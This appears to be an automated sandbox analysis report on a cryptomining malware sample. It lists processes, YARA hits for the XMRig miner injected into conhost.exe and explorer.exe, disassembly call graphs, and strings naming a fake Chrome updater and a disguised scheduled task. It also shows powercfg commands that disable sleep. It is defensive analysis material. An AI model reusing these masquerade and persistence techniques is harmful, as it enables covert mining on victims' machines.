                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\conhost.exe
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:20
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\explorer.exe
                                                                    Imagebase:0x7ff72b770000
                                                                    File size:5'141'208 bytes
                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:24
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                    Imagebase:0x7ff602810000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:32
                                                                    Start time:06:46:04
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00007FF632AE12FD Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1693992544.00007FF632AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF632AE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1693970971.00007FF632AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694015215.00007FF632AE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694413355.00007FF633055000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694429558.00007FF633057000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694446092.00007FF63305B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694446092.00007FF63305D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694484700.00007FF633060000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694502516.00007FF633061000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff632ae0000_c2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 8417d1f87a51c18aafca4b876cc635c908d455b7236c5c231fa2bd0711d8218f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 56B01230B18305C5F3002F25D88225C3220AB04B01F811034C80C93352CFBC54425710

                                                                      Executed Functions

                                                                      Function 00007FF6028112FD Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1700966607.00007FF602811000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF602810000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1700946103.00007FF602810000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1700987964.00007FF602816000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1701453875.00007FF602D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1701481914.00007FF602D8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1701503788.00007FF602D90000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1701561350.00007FF602D91000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_7ff602810000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 6a7c32b4ee99d95e1c8dc8cb70a9b853a9799724de73b284ed21fa762e9c398f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 3BB09264A2420584E3002B1198412682A206F14B04FA02120C50C82396CEEC94814720

                                                                      Execution Graph

                                                                      Execution Coverage:25%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:12.1%
                                                                      Total number of Nodes:157
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 2464 7ff7780137a7 2466 7ff7780137ce 2464->2466 2465 7ff7780137ef 2466->2465 2467 7ff77801385f signal 2466->2467 2468 7ff778013835 2466->2468 2467->2465 2467->2468 2468->2465 2469 7ff77801387b signal 2468->2469 2469->2465 2508 7ff7780139c8 2509 7ff7780139da EnterCriticalSection 2508->2509 2510 7ff778013a34 2508->2510 2511 7ff7780139f3 2509->2511 2512 7ff778013a2b LeaveCriticalSection 2511->2512 2513 7ff778013a18 free 2511->2513 2512->2510 2513->2512 2473 7ff7780131ec 2474 7ff7780131fe 2473->2474 2476 7ff778013213 2474->2476 2477 7ff778013a3d 2474->2477 2478 7ff778013a53 2477->2478 2479 7ff778013a4b 2477->2479 2478->2476 2479->2478 2480 7ff778013a61 2479->2480 2481 7ff778013a51 2479->2481 2480->2478 2482 7ff778013a6b InitializeCriticalSection 2480->2482 2481->2478 2483 7ff778013ab7 DeleteCriticalSection 2481->2483 2484 7ff778013aa9 free 2481->2484 2482->2478 2483->2478 2484->2481 2514 7ff77801388e 2515 7ff778013893 signal 2514->2515 2516 7ff7780138a5 signal 2515->2516 2517 7ff778013821 2515->2517 2516->2517 2518 7ff778013250 2519 7ff778013277 2518->2519 2520 7ff7780132e3 fprintf 2519->2520 2524 7ff7780131d0 2525 7ff7780131d9 2524->2525 2526 7ff7780131e2 2525->2526 2527 7ff778013a3d 3 API calls 2525->2527 2527->2526 2528 7ff778013816 2529 7ff778013893 signal 2528->2529 2530 7ff778013821 2528->2530 2529->2530 2531 7ff7780138a5 signal 2529->2531 2531->2530 2488 7ff778013958 2489 7ff7780139be 2488->2489 2490 7ff778013973 2488->2490 2490->2489 2491 7ff77801398d EnterCriticalSection LeaveCriticalSection 2490->2491 2491->2489 2495 7ff77801131a 2496 7ff778011131 26 API calls 2495->2496 2497 7ff77801132e 2496->2497 2352 7ff7780112fd 2355 7ff778011131 2352->2355 2356 7ff77801115a 2355->2356 2357 7ff778011172 2356->2357 2358 7ff778011169 Sleep 2356->2358 2359 7ff778011188 _amsg_exit 2357->2359 2360 7ff778011194 2357->2360 2358->2356 2361 7ff7780111b5 2359->2361 2360->2361 2362 7ff77801119a _initterm 2360->2362 2363 7ff7780111de 2361->2363 2364 7ff7780111c5 _initterm 2361->2364 2362->2361 2376 7ff7780134eb 2363->2376 2364->2363 2367 7ff77801122e 2368 7ff778011233 malloc 2367->2368 2369 7ff778011253 2368->2369 2370 7ff778011258 strlen malloc 2369->2370 2371 7ff778011283 2369->2371 2370->2369 2387 7ff778013f50 2371->2387 2373 7ff7780112c4 2374 7ff7780112e8 2373->2374 2375 7ff7780112e3 _cexit 2373->2375 2375->2374 2377 7ff778011208 SetUnhandledExceptionFilter 2376->2377 2379 7ff778013509 2376->2379 2377->2367 2378 7ff77801370f 2378->2377 2381 7ff778013737 VirtualProtect 2378->2381 2379->2378 2380 7ff778013580 2379->2380 2384 7ff7780135bf 2379->2384 2380->2378 2382 7ff77801359e 2380->2382 2381->2378 2382->2380 2408 7ff7780133a4 2382->2408 2384->2378 2385 7ff77801362a 2384->2385 2386 7ff7780133a4 3 API calls 2385->2386 2386->2384 2389 7ff778013f66 2387->2389 2388 7ff778014f9c 2388->2373 2389->2388 2415 7ff77801223c wcslen 2389->2415 2391 7ff778014208 2391->2391 2392 7ff77801223c 3 API calls 2391->2392 2393 7ff7780144ee 2392->2393 2394 7ff77801223c 3 API calls 2393->2394 2395 7ff77801463d 2394->2395 2420 7ff7780113b8 2395->2420 2397 7ff778014801 2397->2397 2430 7ff7780125ae 2397->2430 2399 7ff778014991 _wcsicmp 2401 7ff7780148fe 2399->2401 2401->2399 2401->2401 2402 7ff77801223c 3 API calls 2401->2402 2404 7ff77801219e wcslen wcsncmp wcslen 2401->2404 2406 7ff778014e9c 2401->2406 2433 7ff7780127e2 2401->2433 2436 7ff77801272b 2401->2436 2440 7ff778012789 2401->2440 2443 7ff7780126ad 2401->2443 2402->2401 2404->2401 2406->2373 2409 7ff7780133ca 2408->2409 2410 7ff77801342f VirtualQuery 2409->2410 2412 7ff7780134d3 2409->2412 2411 7ff778013458 2410->2411 2411->2412 2413 7ff778013487 VirtualProtect 2411->2413 2412->2382 2413->2412 2414 7ff7780134bf GetLastError 2413->2414 2414->2412 2416 7ff778012254 2415->2416 2417 7ff77801225a _wcsnicmp 2416->2417 2418 7ff77801226c 2416->2418 2417->2418 2419 7ff778012275 wcslen 2417->2419 2418->2391 2419->2416 2421 7ff7780113f9 2420->2421 2422 7ff778011740 _wcsnicmp 2421->2422 2423 7ff7780115c6 2421->2423 2422->2423 2425 7ff778011772 2422->2425 2423->2397 2424 7ff7780117d8 _wcsnicmp 2424->2423 2427 7ff7780117f3 2424->2427 2425->2424 2425->2425 2426 7ff77801185d _wcsnicmp 2426->2423 2429 7ff77801187c 2426->2429 2427->2426 2427->2427 2428 7ff778011908 wcsstr 2428->2423 2429->2428 2429->2429 2448 7ff778012523 2430->2448 2432 7ff7780125c2 2432->2401 2434 7ff77801228e wcslen 2433->2434 2435 7ff77801280d 2434->2435 2435->2401 2437 7ff77801275b 2436->2437 2438 7ff7780126ad 2 API calls 2437->2438 2439 7ff778012773 2438->2439 2439->2401 2441 7ff778012523 wcslen 2440->2441 2442 7ff778012796 2441->2442 2442->2401 2454 7ff778012427 wcslen 2443->2454 2447 7ff7780126d5 2447->2401 2451 7ff77801228e 2448->2451 2450 7ff77801254f 2450->2432 2452 7ff7780122d0 2451->2452 2452->2452 2453 7ff77801234d wcslen 2452->2453 2453->2450 2456 7ff778012453 2454->2456 2457 7ff778012480 2456->2457 2461 7ff778012390 2456->2461 2458 7ff77801248c 2457->2458 2459 7ff77801228e wcslen 2458->2459 2460 7ff7780124bd 2459->2460 2460->2447 2462 7ff77801228e wcslen 2461->2462 2463 7ff7780123c1 2462->2463 2463->2456 2532 7ff778012c3e 2537 7ff778012b64 2532->2537 2534 7ff778012c66 2535 7ff778012c73 2534->2535 2540 7ff778011b49 2534->2540 2538 7ff77801248c wcslen 2537->2538 2539 7ff778012b77 2538->2539 2539->2534 2542 7ff778011b99 2540->2542 2541 7ff778011cbf wcsncmp 2541->2542 2542->2541 2543 7ff778011d65 2542->2543 2544 7ff778011ef7 wcslen 2543->2544 2545 7ff778011f11 2543->2545 2544->2545 2545->2535 2498 7ff778013b61 strlen 2499 7ff778013bc3 2498->2499 2500 7ff778013b79 2498->2500 2500->2499 2501 7ff778013ba6 strncmp 2500->2501 2501->2499 2501->2500 2546 7ff778011001 2548 7ff77801103c __set_app_type 2546->2548 2549 7ff7780110a9 2548->2549

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_00007FF778012427 45 Function_00007FF778012390 0->45 85 Function_00007FF778012FE9 0->85 1 Function_00007FF778012828 39 Function_00007FF77801308B 1->39 83 Function_00007FF7780130E8 1->83 2 Function_00007FF778013C2A 107 Function_00007FF778013B00 2->107 3 Function_00007FF77801302B 18 Function_00007FF778012F50 3->18 4 Function_00007FF77801272B 55 Function_00007FF7780126AD 4->55 76 Function_00007FF7780119D4 4->76 5 Function_00007FF778013330 6 Function_00007FF778011131 6->5 20 Function_00007FF778013F50 6->20 64 Function_00007FF77801319E 6->64 78 Function_00007FF778013DB8 6->78 86 Function_00007FF7780134EB 6->86 7 Function_00007FF778011335 8 Function_00007FF77801131A 8->6 9 Function_00007FF77801311B 9->18 10 Function_00007FF77801301F 10->18 11 Function_00007FF778013F20 12 Function_00007FF778012523 42 Function_00007FF77801228E 12->42 111 Function_00007FF778013004 12->111 13 Function_00007FF778013B24 14 Function_00007FF778011948 15 Function_00007FF778011B49 15->7 21 Function_00007FF778013055 15->21 22 Function_00007FF77801303A 15->22 30 Function_00007FF778013070 15->30 38 Function_00007FF77801138A 15->38 15->39 48 Function_00007FF77801307C 15->48 93 Function_00007FF7780130D9 15->93 108 Function_00007FF778012D00 15->108 16 Function_00007FF778013250 73 Function_00007FF778013DD0 16->73 17 Function_00007FF778011350 103 Function_00007FF778012F12 18->103 19 Function_00007FF778013D50 20->1 20->4 20->7 20->11 20->19 23 Function_00007FF77801223C 20->23 34 Function_00007FF778013064 20->34 37 Function_00007FF778012789 20->37 20->38 50 Function_00007FF778012884 20->50 20->55 56 Function_00007FF7780125AE 20->56 63 Function_00007FF778011A9B 20->63 20->64 65 Function_00007FF77801219E 20->65 20->76 79 Function_00007FF7780113B8 20->79 81 Function_00007FF7780130C1 20->81 95 Function_00007FF7780127E2 20->95 20->108 21->18 22->18 24 Function_00007FF778013A3D 24->5 25 Function_00007FF778012C3E 25->15 35 Function_00007FF778012B64 25->35 41 Function_00007FF778012A8C 25->41 91 Function_00007FF778012AF5 25->91 101 Function_00007FF778013010 25->101 26 Function_00007FF77801713E 27 Function_00007FF778013244 28 Function_00007FF778012A46 28->10 29 Function_00007FF778013046 29->18 30->18 31 Function_00007FF778013958 32 Function_00007FF778013760 33 Function_00007FF778013B61 33->107 34->18 40 Function_00007FF77801248C 35->40 44 Function_00007FF778012F8F 35->44 60 Function_00007FF778012FB6 35->60 35->85 94 Function_00007FF778012FDD 35->94 36 Function_00007FF778013287 36->73 37->12 37->44 37->85 39->18 40->42 53 Function_00007FF778012FAA 40->53 41->28 41->29 72 Function_00007FF7780129C9 41->72 97 Function_00007FF7780129E3 41->97 42->7 43 Function_00007FF77801388E 43->5 44->18 45->42 45->53 46 Function_00007FF778013D90 47 Function_00007FF778013290 47->73 48->18 49 Function_00007FF778013C7F 49->107 50->38 50->85 89 Function_00007FF7780130F4 50->89 51 Function_00007FF7780137A7 52 Function_00007FF7780130A9 52->18 53->18 54 Function_00007FF7780132AB 54->73 55->0 55->40 55->60 55->85 56->12 56->22 59 Function_00007FF7780130B5 56->59 82 Function_00007FF778012FC2 56->82 56->85 57 Function_00007FF778013DB0 58 Function_00007FF7780132B4 58->73 59->18 60->18 61 Function_00007FF778013299 61->73 62 Function_00007FF77801309A 62->18 63->38 63->81 63->85 65->14 65->15 65->19 65->62 65->85 66 Function_00007FF778013DA0 67 Function_00007FF7780129A0 68 Function_00007FF7780132A2 68->73 69 Function_00007FF778013CA3 69->13 69->107 70 Function_00007FF7780133A4 70->49 75 Function_00007FF778013BD1 70->75 71 Function_00007FF7780139C8 72->67 74 Function_00007FF7780131D0 74->24 75->107 76->7 77 Function_00007FF77801B1B8 79->7 79->38 79->85 79->89 100 Function_00007FF77801310F 79->100 110 Function_00007FF778013103 79->110 80 Function_00007FF7780131C0 81->18 82->18 83->18 84 Function_00007FF7780110E8 85->18 86->19 86->70 112 Function_00007FF778013C04 86->112 87 Function_00007FF7780131EC 87->24 88 Function_00007FF778013DF1 89->18 90 Function_00007FF778012FF5 90->18 91->90 92 Function_00007FF7780170D8 93->18 94->18 95->42 95->52 96 Function_00007FF778013CE2 96->13 96->107 97->3 97->10 98 Function_00007FF778012D0A 99 Function_00007FF778012D0C 99->108 100->18 101->18 102 Function_00007FF778013E11 103->99 104 Function_00007FF778013816 104->5 105 Function_00007FF7780128F9 105->9 105->38 105->85 105->89 106 Function_00007FF7780112FD 106->6 109 Function_00007FF778011001 109->46 109->66 109->80 110->18 111->18 112->107

                                                                      Executed Functions

                                                                      Function 00007FF778011131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                      • String ID:
                                                                      • API String ID: 3714283218-0
                                                                      • Opcode ID: f29cc23ca943b4e8fae484110a2de79a05b13f64e9a64d463718a084873ee1c9
                                                                      • Instruction ID: 0b21ca9dcdc46bc7328dac7f2eeae190e5fbc8499ec872ccccf232e6282e1e6c
                                                                      • Opcode Fuzzy Hash: f29cc23ca943b4e8fae484110a2de79a05b13f64e9a64d463718a084873ee1c9
                                                                      • Instruction Fuzzy Hash: D7514C23E3860289FB55BB12E84427DEBA1AF48BA4FA55831D90D473D5FE2CF400C328
                                                                      Function 00007FF778013F50 Relevance: 30.8, APIs: 1, Strings: 19, Instructions: 797COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp_wcsnicmpwcslen
                                                                      • String ID: /$0$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$[$\BaseNamedObjects\myfqvfexgknmtduy$\BaseNamedObjects\tuctlojtwqxvvguwxpuyczur$\BaseNamedObjects\wbzsypnzkfn$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
                                                                      • API String ID: 3926934318-1602290141
                                                                      • Opcode ID: 0e6810b932d409e2e9b7040240a4c6d49041b727a79761a6471f3bdabbce411c
                                                                      • Instruction ID: ff384830e25590f4166e67e16a9e1b11754b1cdcc782d0a6867fddb611ab8905
                                                                      • Opcode Fuzzy Hash: 0e6810b932d409e2e9b7040240a4c6d49041b727a79761a6471f3bdabbce411c
                                                                      • Instruction Fuzzy Hash: 91A29D23D3C68294EB21AB15E4453BDEBA1AB94364FE04835C64C076E6FF7DB159C328

                                                                      Non-executed Functions

                                                                      Function 00007FF77801B1B8 Relevance: .1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 139e2274ff43c33dfa5c470873814a5401d4d66c52b76f361c0aac30dcef008a
                                                                      • Instruction ID: c0bde9ff439e72f13e9bccaa0a5feaef270fed47c0ad24d77e3f62addb1ec24c
                                                                      • Opcode Fuzzy Hash: 139e2274ff43c33dfa5c470873814a5401d4d66c52b76f361c0aac30dcef008a
                                                                      • Instruction Fuzzy Hash: 6E51AE47D3D6D149E29279248C7A16CEFD19FA2A317DD447ACA48036D3BA0E3C1AD329
                                                                      Function 00007FF778012F50 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
